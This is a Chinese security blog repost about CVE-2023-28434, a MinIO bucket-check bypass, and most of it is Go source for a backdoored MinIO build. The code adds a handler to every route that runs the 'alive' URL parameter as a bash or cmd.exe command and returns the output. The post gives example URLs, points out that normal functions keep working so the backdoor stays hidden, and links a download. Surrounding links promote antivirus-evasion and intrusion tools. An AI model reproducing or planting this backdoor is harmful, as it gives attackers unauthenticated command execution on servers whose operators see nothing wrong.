服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

CVE-2023-28434:MinIO未授权RCE

日期: 来源:Hack分享吧收集编辑:AbelChe

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。


Minio 是一个多云对象存储框架。在 RELEASE.2023-03-20T20-16-18Z 之前,攻击者可以使用精心设计的请求绕过元数据存储桶名称检查,并在处理“PostPolicyBucket”时将对象放入任何存储桶。

要执行此攻击,攻击者需要具有“arn:aws:s3:::*”权限的凭据,以及启用的控制台 API 访问权限。此问题已在 RELEASE.2023-03-20T20-16-18Z 中修复。解决方法是启用浏览器 API 访问并关闭“MINIO_BROWSER=off”。


改变了什么?

add cmd/x.go,用于exec系统命令

package cmd
import ( "os/exec" "runtime")
func getOutputDirectly(commandStr string) string { var execGlobalOutput string var shell [2]string var systemOS string = runtime.GOOS if systemOS == "linux" || systemOS == "darwin" { shell[0], shell[1] = "/bin/bash", "-c" } else { shell[0], shell[1] = "C:\\Windows\\System32\\cmd.exe", "/c" } cmd := exec.Command(shell[0], shell[1], commandStr) output, err := cmd.Output() if err != nil { return "" } execGlobalOutput += string(output) return execGlobalOutput}

cmd/routers.go,添加第 72 行
// ..........  setUploadForwardingHandler,  // Add bucket forwarding handler  setBucketForwardingHandler,  // Add new handlers here.  xHandler, // ADD THIS LINE }
// configureServer handler returns final handler for the http server.func configureServerHandler(endpointServerPools EndpointServerPools) (http.Handler, error) {// ..........

cmd/generic-handlers.go,在末尾添加xHandler函数
func xHandler(h http.Handler) http.Handler {  return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {    var arg string    values := r.URL.Query()    arg = values.Get("alive")    if arg != "" {      w.Write([]byte(getOutputDirectly(arg)))      return    }    h.ServeHTTP(w, r)  })}

可以做什么?

1. GLOBAL 后门
http://1.2.3.4/?alive=whoamihttp://1.2.3.4/anything?alive=whoami


2. 正常功能不受影响


下载地址

点击下方名片进入公众号

回复关键字【230404】获取下载链接



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。


往期推荐工具

渗透测试常用的数据库综合利用工具

RequestTemplate红队内网渗透工具

Railgun - 一款GUI界面的渗透工具

GoBypass - Golang免杀生成工具

ByPassBehinder冰蝎WebShell免杀工具

SweetBabyScan内网资产探测漏扫工具

掩日 - 适用于红队的综合免杀工具

AuxTools浮鱼渗透辅助工具箱V1.0


POCbomber红队快速打点漏洞检测工具

相关阅读

  • S!爬取补天公益src公司名称脚本

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。import requestsimport js
  • 一款代理扫描器

  • 作者:depycode,转载于作者github,给作者点个star。原文地址:https://github.com/depycode/burpsuite_hack一款代理扫描器适配python3.6+支持 GET/POST/无限嵌套json、list的漏洞
  • 【安全头条】MCPA协会敦促美军建立独立网络部队

  • 第487期你好呀~欢迎来到“安全头条”!如果你是第一次光顾,可以先阅读站内公告了解我们哦。欢迎各位新老顾客前来拜访,在文章底部时常交流、疯狂讨论,都是小安欢迎哒~如果对本小
  • 【技术分享】shiro550漏洞复现与研究

  • 前言:就像雨总会停,雾总会散,同样地没有谁会一直失败。1漏洞描述1.shiro概述Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直
  • 关于“张继科”,中央政法委发声!

  • 来源:中央政法委长安剑版权归原作者所有,如有侵权请及时联系
    4月2日晚间“张继科借条”冲上微博热搜首位此外微博热搜榜首前十也有多条与张继科相关词条
    有关张继科因借

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • CVE-2023-28434:MinIO未授权RCE

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。Minio 是一个多云对象存储
  • 掩日 - 适用于红队的综合免杀工具

  • 注意:本文仅限用于技术研究和学习,坚决反对一切危害网络安全的行为。依赖环境如果使用工具的全部功能,请确保满足以下全部条件:64位 Windows 7 或以上操作系统.net framework 4.
  • 对某良心云下载限速最新破解测试

  • 对于网盘,我们可以说是对它又爱又恨。在前面的文章中,我们讲到了利用IDMA下载的方法。但是很不稳定。最近不少帖子通过游戏修改器来加速下载任务。让我们一起来看看吧。实验环
  • S!爬取补天公益src公司名称脚本

  • 声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。import requestsimport js
  • 速看!浙江又一批事业单位正在招聘

  • 近日,浙江又一批事业单位发布招聘(选聘)公告,一起来看有没有适合你的岗位~浙江师范大学附属中学浙江师范大学附属中学为公益二类事业单位,预算形式为财政适当补助。招聘计划本批